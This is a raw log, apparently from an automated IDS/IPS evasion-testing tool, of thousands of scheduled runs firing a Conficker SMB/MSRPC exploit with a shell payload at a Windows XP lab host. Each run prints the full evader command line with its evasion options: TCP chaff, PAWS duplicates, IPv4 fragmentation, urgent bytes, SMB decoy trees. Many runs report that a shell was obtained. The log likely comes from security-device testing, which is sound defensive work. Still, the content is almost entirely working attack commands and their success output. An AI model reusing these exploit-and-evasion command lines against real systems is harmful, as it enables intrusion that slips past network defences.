1209 runs averaging 1.94 runs / second ; progress: 624/43200.......
1216 runs averaging 1.93 runs / second ; progress: 629/43200.........
1225 runs averaging 1.93 runs / second ; progress: 634/43200.
1226 runs averaging 1.92 runs / second ; progress: 639/43200..Pid 1869 timed out - killed
2015-06-07 23:30:10 INFO
Timed out (10.62.90.115):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=39459 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=e7ylkdMUHfM --evasion=[smb_connect,msrpc_bind]tcp_chaff,"50%","chksum|outofwindow|shorthdr","shuffle30" --evasion=[smb_opentree,end]tcp_chaff,"1","chksum|nullchksum|outofwindow|shorthdr|longhdr","shuffle" --evasion=[smb_opentree,msrpc_req]tcp_paws,"1","5","random_alphanum" --verifydelay=1000 --payload=shell
Info: Using random seed e7ylkdMUHfN
The following evasions are applied from stage smb_connect to msrpc_bind:
- 50% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
* Invalid TCP checksum.
* An out-of-window sequence number.
* TCP header shorter than 20 bytes
* Duplicate packet has 30 bytes of original payload, then shuffled original payload
The following evasions are applied from stage smb_opentree to end:
- With every 1 TCP packet a TCP chaff packet is sent. The chaff packet has:
* Invalid TCP checksum.
* NULL TCP checksum.
* An out-of-window sequence number.
* TCP header shorter than 20 bytes
* TCP header longer than packet total size
* Duplicate packet has shuffled original payload
The following evasions are applied from stage smb_opentree to msrpc_req:
- Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 5> and has random alphanumeric bytes as payload

Info: NetBIOS connection 10.62.90.115:39459 -> 10.35.1.207:445
Terminated
.Pid 1876 timed out - killed
2015-06-07 23:30:11 INFO
Timed out (10.62.90.114):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=12116 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=GT8tDxBjFyg --evasion=[start,smb_connect]ipv4_opt,"1","inc","random" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"1","random" --verifydelay=1000 --payload=shell
Info: Using random seed GT8tDxBjFyg
The following evasions are applied from stage start to smb_connect:
- Every 1th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
The duplicate packet has random bytes as payload
The following evasions are applied from stage smb_openpipe to msrpc_req:
- Add a random urgent data byte to every 1 TCP segment.

Info: NetBIOS connection 10.62.90.114:12116 -> 10.35.1.207:445
Terminated
.......
1238 runs averaging 1.92 runs / second ; progress: 644/43200...Pid 1971 timed out - killed
2015-06-07 23:30:16 INFO
Timed out (10.62.90.111):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=43442 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=HPkkhP7YkHU --evasion=[smb_openpipe,msrpc_bind]tcp_tsoptreply,"le" --evasion=[smb_opentree,msrpc_req]tcp_urgent,"2","zero" --verifydelay=1000 --payload=shell
Info: Using random seed HPkkhP7YkHU
The following evasions are applied from stage smb_opentree to msrpc_req:
- Add a zero urgent data byte to every 2 TCP segment.
The following evasions are applied from stage smb_openpipe to msrpc_bind:
- TCP timestamps echo reply value is sent in the wrong endianness

Info: NetBIOS connection 10.62.90.111:43442 -> 10.35.1.207:445
Terminated
....2015-06-07 23:30:18 INFO
Success. (10.62.90.115):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=46188 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=1HDuHIYDD40 --evasion=[start,end]tcp_paws,"50%","9","random_alphanum" --evasion=[smb_connect,end]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
Info: Using random seed 1HDuHIYDD43
- 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 9> and has random alphanumeric bytes as payload
The following evasions are applied from stage smb_connect to end:
- TCP timestamps echo reply value is sent in the wrong endianness

Info: NetBIOS connection 10.62.90.115:46188 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Shell closed
0: Success.
......
1253 runs averaging 1.93 runs / second ; progress: 649/43200................
1269 runs averaging 1.94 runs / second ; progress: 654/43200...............
1284 runs averaging 1.95 runs / second ; progress: 659/43200....................
1304 runs averaging 1.96 runs / second ; progress: 664/43200............
1316 runs averaging 1.97 runs / second ; progress: 669/43200............
1328 runs averaging 1.97 runs / second ; progress: 674/43200..............
1342 runs averaging 1.97 runs / second ; progress: 680/43200..............
1356 runs averaging 1.98 runs / second ; progress: 685/432002015-06-07 23:30:55 INFO
Success. (10.62.90.114):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=24700 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=NCyRKw2M+QU --evasion=[start,netbios_connect]ipv4_frag,"1464" --evasion=[netbios_connect,msrpc_req]tcp_paws,"1","110160382","alphanumrandomized" --verifydelay=1000 --payload=shell
Info: Using random seed NCyRKw2M+QU
The following evasions are applied from stage start to netbios_connect:
- IPv4 fragments with at most 1464 bytes per fragment
The following evasions are applied from stage netbios_connect to msrpc_req:
- Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 110160382> and has original payload with alphanumeric bytes randomized

Info: NetBIOS connection 10.62.90.114:24700 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Shell closed
0: Success.
.............
1370 runs averaging 1.99 runs / second ; progress: 690/43200........
1378 runs averaging 1.98 runs / second ; progress: 695/43200............
1390 runs averaging 1.99 runs / second ; progress: 700/43200............
1402 runs averaging 1.99 runs / second ; progress: 705/43200.......
1409 runs averaging 1.99 runs / second ; progress: 710/43200.............
1422 runs averaging 1.99 runs / second ; progress: 715/43200...........
1433 runs averaging 1.99 runs / second ; progress: 720/43200.........
1442 runs averaging 1.99 runs / second ; progress: 725/43200....
1446 runs averaging 1.98 runs / second ; progress: 730/43200.......
1453 runs averaging 1.98 runs / second ; progress: 735/43200........
1461 runs averaging 1.98 runs / second ; progress: 740/43200.2015-06-07 23:31:50 INFO
Success. (10.62.90.114):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=24569 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=2cSDsed3ITE --evasion=[smb_connect,msrpc_req]ipv4_opt,"3","inc","alphanumrandomized" --evasion=[smb_opentree,end]tcp_paws,"5","6","shuffle30" --verifydelay=1000 --payload=shell
Info: Using random seed 2cSDsed3ITH
The following evasions are applied from stage smb_connect to msrpc_req:
- Every 3th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
The duplicate packet has identical payload except that alphanumeric characters are randomized
The following evasions are applied from stage smb_opentree to end:
- Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has 30 bytes of original payload, then shuffled original payload

Info: NetBIOS connection 10.62.90.114:24569 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Shell closed
0: Success.
.....
1468 runs averaging 1.97 runs / second ; progress: 745/43200...2015-06-07 23:31:57 INFO
Success. (10.62.90.111):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=64502 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=yxKHXWbMZgw --evasion=[msrpc_bind,msrpc_req]smb_fnameobf,"add_null_trailer" --evasion=[start,end]tcp_paws,"50%","3","random_alpha" --verifydelay=1000 --payload=shell
Info: Using random seed yxKHXWbMZgz
- 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 3> and has random alpha bytes as payload
The following evasions are applied from stage msrpc_bind to msrpc_req:
- The SMB filename is obfuscated:
* A 0x00 and random alphanumeric characters are appended to the filename

Info: NetBIOS connection 10.62.90.111:64502 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Shell closed
0: Success.
...........
1483 runs averaging 1.98 runs / second ; progress: 750/43200.....
1488 runs averaging 1.97 runs / second ; progress: 755/43200....
1492 runs averaging 1.96 runs / second ; progress: 760/43200.2015-06-07 23:32:11 INFO
Success. (10.62.90.115):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=45139 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=dzj0POWrydM --evasion=[smb_opentree,msrpc_bind]smb_chaff,"25%","write_flag","msrpc" --evasion=[smb_opentree,msrpc_req]tcp_paws,"3","6","shuffle" --verifydelay=1000 --payload=shell
Info: Using random seed dzj0POWrydN
The following evasions are applied from stage smb_opentree to msrpc_req:
- Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has shuffled original payload
The following evasions are applied from stage smb_opentree to msrpc_bind:
- 25% probability to send an SMB chaff message before real messages. The chaff is a WriteAndX message with a broken write mode flag, and has random MSRPC request-like payload

Info: NetBIOS connection 10.62.90.115:45139 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: CommandShell::SendCommand() - Failed to send string
Info: Command shell connection reset.
Info: Shell closed
0: Success.
........
1502 runs averaging 1.96 runs / second ; progress: 765/43200....
1506 runs averaging 1.96 runs / second ; progress: 770/43200Pid 3944 timed out - killed
2015-06-07 23:32:22 INFO
Timed out (10.62.90.116):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=42916 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=BSmDZs2V2KY --evasion=[msrpc_bind,msrpc_req]msrpc_ndrflag,"char_unspec","float_ibm","byte3_nonzero","byte4_nonzero" --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"2","random" --verifydelay=1000 --payload=shell
Info: Using random seed BSmDZs2V2KY
The following evasions are applied from stage smb_opentree to msrpc_bind:
- Add a random urgent data byte to every 2 TCP segment.
The following evasions are applied from stage msrpc_bind to msrpc_req:
- MSRPC NDR flag is modified:
* Unspecified character encoding
* IBM floating point value encoding
* Reserved 3rd byte is set to a random non-zero value
* Reserved 4th byte is set to a random non-zero value


Info: NetBIOS connection 10.62.90.116:42916 -> 10.35.1.207:445
Terminated

1507 runs averaging 1.94 runs / second ; progress: 775/43200.
1508 runs averaging 1.93 runs / second ; progress: 780/43200.........
1517 runs averaging 1.93 runs / second ; progress: 785/43200.......
1524 runs averaging 1.93 runs / second ; progress: 790/43200.......
1531 runs averaging 1.93 runs / second ; progress: 795/43200...
1534 runs averaging 1.92 runs / second ; progress: 800/43200.
1535 runs averaging 1.91 runs / second ; progress: 805/43200Pid 4544 timed out - killed
2015-06-07 23:32:56 INFO
Timed out (10.62.90.118):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=52467 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=4ftBvYDCVZs --evasion=[netbios_connect,end]ipv4_frag,"1472" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"1","random" --verifydelay=1000 --payload=shell
Info: Using random seed 4ftBvYDCVZv
The following evasions are applied from stage netbios_connect to end:
- IPv4 fragments with at most 1472 bytes per fragment
The following evasions are applied from stage smb_openpipe to msrpc_req:
- Add a random urgent data byte to every 1 TCP segment.

Info: NetBIOS connection 10.62.90.118:52467 -> 10.35.1.207:445
Terminated
....
1540 runs averaging 1.90 runs / second ; progress: 810/43200......
1546 runs averaging 1.90 runs / second ; progress: 815/43200......
1552 runs averaging 1.89 runs / second ; progress: 820/43200......
1558 runs averaging 1.89 runs / second ; progress: 825/43200.....
1563 runs averaging 1.88 runs / second ; progress: 830/43200..
1565 runs averaging 1.87 runs / second ; progress: 835/43200
1565 runs averaging 1.86 runs / second ; progress: 840/43200.......
1572 runs averaging 1.86 runs / second ; progress: 845/43200Pid 5247 timed out - killed
2015-06-07 23:33:36 INFO
Timed out (10.62.90.117):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=15300 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=hPpd4kR6QYQ --evasion=[smb_openpipe,msrpc_req]tcp_overlap,"4","new","random_alpha" --evasion=[smb_opentree,msrpc_req]tcp_urgent,"2","random_alpha" --verifydelay=1000 --payload=shell
Info: Using random seed hPpd4kR6QYS
The following evasions are applied from stage smb_opentree to msrpc_req:
- Add a random alphaurgent data byte to every 2 TCP segment.
The following evasions are applied from stage smb_openpipe to msrpc_req:
- TCP segments are set to overlap by 4 bytes, with the later packet containing the correct payload. Overlapping part has random alpha bytes as payload

Info: NetBIOS connection 10.62.90.117:15300 -> 10.35.1.207:445
Terminated
....2015-06-07 23:33:38 INFO
Success. (10.62.90.117):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=43645 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=NWacMXl/kLk --evasion=[msrpc_bind,msrpc_req]tcp_chaff,"21","chksum|nullflag|shorthdr|longhdr","random_alpha" --evasion=[smb_opentree,msrpc_req]tcp_paws,"3","128119346","random_alpha" --verifydelay=1000 --payload=shell
Info: Using random seed NWacMXl/kLk
The following evasions are applied from stage smb_opentree to msrpc_req:
- Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 128119346> and has random alpha bytes as payload
The following evasions are applied from stage msrpc_bind to msrpc_req:
- With every 21 TCP packet a TCP chaff packet is sent. The chaff packet has:
* Invalid TCP checksum.
* NULL TCP control flags.
* TCP header shorter than 20 bytes
* TCP header longer than packet total size
* Duplicate packet has random alpha bytes as payload

Info: NetBIOS connection 10.62.90.117:43645 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Shell closed
0: Success.
.....
1583 runs averaging 1.86 runs / second ; progress: 850/43200..Pid 5416 timed out - killed
2015-06-07 23:33:42 INFO
Timed out (10.62.90.110):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=30642 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=QbaOab59OMc --evasion=[smb_opentree,smb_openpipe]tcp_chaff,"21","outofwindow","alphanumrandomized" --evasion=[smb_openpipe,msrpc_bind]tcp_chaff,"50%","chksum|nullflag|outofwindow","unmodified" --evasion=[smb_openpipe,end]tcp_urgent,"1","zero" --verifydelay=1000 --payload=shell
Info: Using random seed QbaOab59OMd
The following evasions are applied from stage smb_opentree to smb_openpipe:
- With every 21 TCP packet a TCP chaff packet is sent. The chaff packet has:
* An out-of-window sequence number.
* Duplicate packet has original payload with alphanumeric bytes randomized
The following evasions are applied from stage smb_openpipe to msrpc_bind:

The following evasions are applied from stage smb_openpipe to end:
- Add a zero urgent data byte to every 1 TCP segment.

Info: NetBIOS connection 10.62.90.110:30642 -> 10.35.1.207:445
Terminated
......
1592 runs averaging 1.86 runs / second ; progress: 855/43200..2015-06-07 23:33:46 INFO
Success. (10.62.90.110):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=17668 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=No54XXttjfs --evasion=[start,end]tcp_initialseq,"3" --evasion=[smb_opentree,end]tcp_paws,"50%","8","random_alpha" --verifydelay=1000 --payload=shell
Info: Using random seed No54XXttjfs
- Initial TCP sequence number is set to 0xffffffff - 3
The following evasions are applied from stage smb_opentree to end:
- 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has random alpha bytes as payload

Info: NetBIOS connection 10.62.90.110:17668 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Shell closed
0: Success.
...........
1606 runs averaging 1.87 runs / second ; progress: 860/43200............
1618 runs averaging 1.87 runs / second ; progress: 866/43200.....
1623 runs averaging 1.86 runs / second ; progress: 871/43200
1623 runs averaging 1.85 runs / second ; progress: 876/43200.....
1628 runs averaging 1.85 runs / second ; progress: 881/43200............
1640 runs averaging 1.85 runs / second ; progress: 886/43200......
1646 runs averaging 1.85 runs / second ; progress: 891/43200...
1649 runs averaging 1.84 runs / second ; progress: 896/43200.........
1658 runs averaging 1.84 runs / second ; progress: 901/43200...........2015-06-07 23:34:35 INFO
Success. (10.62.90.111):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=59061 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=Jtc7r4XedFw --evasion=[smb_connect,msrpc_req]smb_decoytrees,"3","6","2","random_msrpcreq" --evasion=[smb_opentree,end]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
Info: Using random seed Jtc7r4XedFw
The following evasions are applied from stage smb_connect to msrpc_req:
- Before normal SMB writes, 3 SMB trees are opened and 6 writes are performed to them. The write payload is 2 bytes of MSRPC request-like data.
The following evasions are applied from stage smb_opentree to end:
- TCP timestamps echo reply value is sent in the wrong endianness

Info: NetBIOS connection 10.62.90.111:59061 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Shell closed
0: Success.
.
1671 runs averaging 1.85 runs / second ; progress: 906/43200.................
1688 runs averaging 1.85 runs / second ; progress: 911/43200Pid 5990 timed out - killed
2015-06-07 23:34:41 INFO
Timed out (10.62.90.112):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=58631 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=zh+fzTjgSBM --evasion=[smb_connect,end]netbios_chaff,"25%","small_unspec|http_get|http_post|broken_length" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"50%","random_alpha" --verifydelay=1000 --payload=shell
Info: Using random seed zh+fzTjgSBP
The following evasions are applied from stage smb_connect to end:
- 25% probability to send a chaff NetBIOS message before an actual NetBIOS message. The chaff message is a small NetBIOS message of an unspecified type. The chaff message is an unspecified NetBIOS message with HTTP GET request like payload. The chaff message is an unspecified NetBIOS message with HTTP POST request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
The following evasions are applied from stage smb_openpipe to msrpc_bind:
- 50% probability to add a random alphaurgent data byte to a TCP segment.

Info: NetBIOS connection 10.62.90.112:58631 -> 10.35.1.207:445
Terminated
...............
1704 runs averaging 1.86 runs / second ; progress: 916/432002015-06-07 23:34:46 INFO
Success. (10.62.90.112):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=37611 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=O/Vg484ppb0 --evasion=[smb_connect,msrpc_bind]ipv4_frag,"192" --evasion=[msrpc_bind,msrpc_req]tcp_paws,"1","6","shuffle" --evasion=[smb_opentree,smb_openpipe]tcp_segvar,"1577","40367" --verifydelay=1000 --payload=shell
Info: Using random seed O/Vg484ppb0
The following evasions are applied from stage smb_connect to msrpc_bind:
- IPv4 fragments with at most 192 bytes per fragment
The following evasions are applied from stage smb_opentree to smb_openpipe:
- TCP packets are segmented to contain between 1577 and 40367 bytes of payload.
The following evasions are applied from stage msrpc_bind to msrpc_req:
- Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has shuffled original payload

Info: NetBIOS connection 10.62.90.112:37611 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Shell closed
0: Success.
...........
1716 runs averaging 1.86 runs / second ; progress: 921/43200.......
1723 runs averaging 1.86 runs / second ; progress: 926/43200............
1735 runs averaging 1.86 runs / second ; progress: 931/43200...............
1750 runs averaging 1.87 runs / second ; progress: 936/43200................
1766 runs averaging 1.88 runs / second ; progress: 941/43200....2015-06-07 23:35:13 INFO
Success. (10.62.90.116):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=34997 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=If/m9xhogZo --evasion=[netbios_connect,smb_opentree]ipv4_opt,"8","inc","alpharandomized" --evasion=[netbios_connect,msrpc_req]tcp_paws,"75%","267969810","alphanumrandomized" --verifydelay=1000 --payload=shell
Info: Using random seed If/m9xhogZo
The following evasions are applied from stage netbios_connect to smb_opentree:
- Every 8th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
The duplicate packet has identical payload except that alphabetic characters are randomized
The following evasions are applied from stage netbios_connect to msrpc_req:
- 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 267969810> and has original payload with alphanumeric bytes randomized

Info: NetBIOS connection 10.62.90.116:34997 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Command shell connection reset.
Info: CommandShell::SendCommand() - Failed to send string
Info: Shell closed
0: Success.
.....
1776 runs averaging 1.88 runs / second ; progress: 946/43200................2015-06-07 23:35:21 INFO
Success. (10.62.90.111):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=31846 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=g+Vl2tI+pn8 --evasion=[smb_connect,end]smb_chaff,"21","write_flag","zero" --evasion=[smb_connect,msrpc_req]smb_decoytrees,"4","3","1723","random_msrpcreq" --verifydelay=1000 --payload=shell
Info: Using random seed g+Vl2tI+pn+
The following evasions are applied from stage smb_connect to end:
- Before every 21th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has zeroes for payload
The following evasions are applied from stage smb_connect to msrpc_req:
- Before normal SMB writes, 4 SMB trees are opened and 3 writes are performed to them. The write payload is 1723 bytes of MSRPC request-like data.

Info: NetBIOS connection 10.62.90.111:31846 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: CommandShell::SendCommand() - Failed to send string
Info: Command shell connection reset.
Info: Shell closed
0: Success.
.
1794 runs averaging 1.89 runs / second ; progress: 951/43200..................
1812 runs averaging 1.90 runs / second ; progress: 956/43200.........
1821 runs averaging 1.89 runs / second ; progress: 961/43200..2015-06-07 23:35:34 INFO
Success. (10.62.90.111):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=54267 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=7y0JaWVYTKY --evasion=[start,smb_opentree]ipv4_opt,"13","inc","random_alphanum" --evasion=[smb_connect,end]tcp_paws,"5","124871207","alpharandomized" --verifydelay=1000 --payload=shell
Info: Using random seed 7y0JaWVYTKb
The following evasions are applied from stage start to smb_opentree:
- Every 13th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
The duplicate packet has random alphanumeric bytes as payload
The following evasions are applied from stage smb_connect to end:
  1175. - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 124871207> and has original payload with alphabetic bytes randomized
  1176.  
  1177. Info: NetBIOS connection 10.62.90.111:54267 -> 10.35.1.207:445
  1178. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1179. Info: Sending MSRPC request with exploit
  1180. Info: Shell found, attack succeeded
  1181. Info: CommandShell::SendCommand() - Failed to send string
  1182. Info: Command shell connection reset.
  1183. Info: Shell closed
  1184. 0: Success.
  1185. ............
  1186. 1836 runs averaging 1.90 runs / second ; progress: 966/43200.........
  1187. 1845 runs averaging 1.90 runs / second ; progress: 971/43200...............
  1188. 1860 runs averaging 1.91 runs / second ; progress: 976/43200..2015-06-07 23:35:46 INFO
  1189. Success. (10.62.90.116):
  1190. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=53810 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=l+IKIQ4Qqwk --evasion=[msrpc_bind,end]tcp_chaff,"3","nullflag|shorthdr","alpharandomized" --evasion=[smb_connect,end]tcp_paws,"50%","268435455","alpharandomized" --verifydelay=1000 --payload=shell
  1191. Info: Using random seed l+IKIQ4Qqwm
  1192. The following evasions are applied from stage smb_connect to end:
  1193. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has original payload with alphabetic bytes randomized
  1194. The following evasions are applied from stage msrpc_bind to end:
  1195. - With every 3 TCP packet a TCP chaff packet is sent. The chaff packet has:
  1196. * NULL TCP control flags.
  1197. * TCP header shorter than 20 bytes
  1198. * Duplicate packet has original payload with alphabetic bytes randomized
  1199.  
  1200. Info: NetBIOS connection 10.62.90.116:53810 -> 10.35.1.207:445
  1201. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1202. Info: Sending MSRPC request with exploit
  1203. Info: Shell found, attack succeeded
  1204. Info: Shell closed
  1205. 0: Success.
  1206. ...............
  1207. 1878 runs averaging 1.91 runs / second ; progress: 981/43200..2015-06-07 23:35:52 INFO
  1208. Success. (10.62.90.111):
  1209. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=37059 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=p48gpM55008 --evasion=[netbios_connect,end]tcp_paws,"50%","70435613","random_alphanum" --evasion=[netbios_connect,smb_connect]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
  1210. Info: Using random seed p48gpM5500+
  1211. The following evasions are applied from stage netbios_connect to end:
  1212. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 70435613> and has random alphanumeric bytes as payload
  1213. The following evasions are applied from stage netbios_connect to smb_connect:
  1214. - TCP timestamps echo reply value is sent in the wrong endianness
  1215.  
  1216. Info: NetBIOS connection 10.62.90.111:37059 -> 10.35.1.207:445
  1217. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1218. Info: Sending MSRPC request with exploit
  1219. Info: Shell found, attack succeeded
  1220. Info: Shell closed
  1221. 0: Success.
  1222. ........
  1223. 1889 runs averaging 1.92 runs / second ; progress: 986/43200..........
  1224. 1899 runs averaging 1.92 runs / second ; progress: 991/43200.....
  1225. 1904 runs averaging 1.91 runs / second ; progress: 996/43200.......
  1226. 1911 runs averaging 1.91 runs / second ; progress: 1001/43200......Pid 7942 timed out - killed
  1227. 2015-06-07 23:36:14 INFO
  1228. Timed out (10.62.90.119):
  1229. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=38370 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=d/0qmv/Fmbo --evasion=[start,msrpc_req]ipv4_frag,"24" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"1","random" --verifydelay=1000 --payload=shell
  1230. Info: Using random seed d/0qmv/Fmbp
  1231. The following evasions are applied from stage start to msrpc_req:
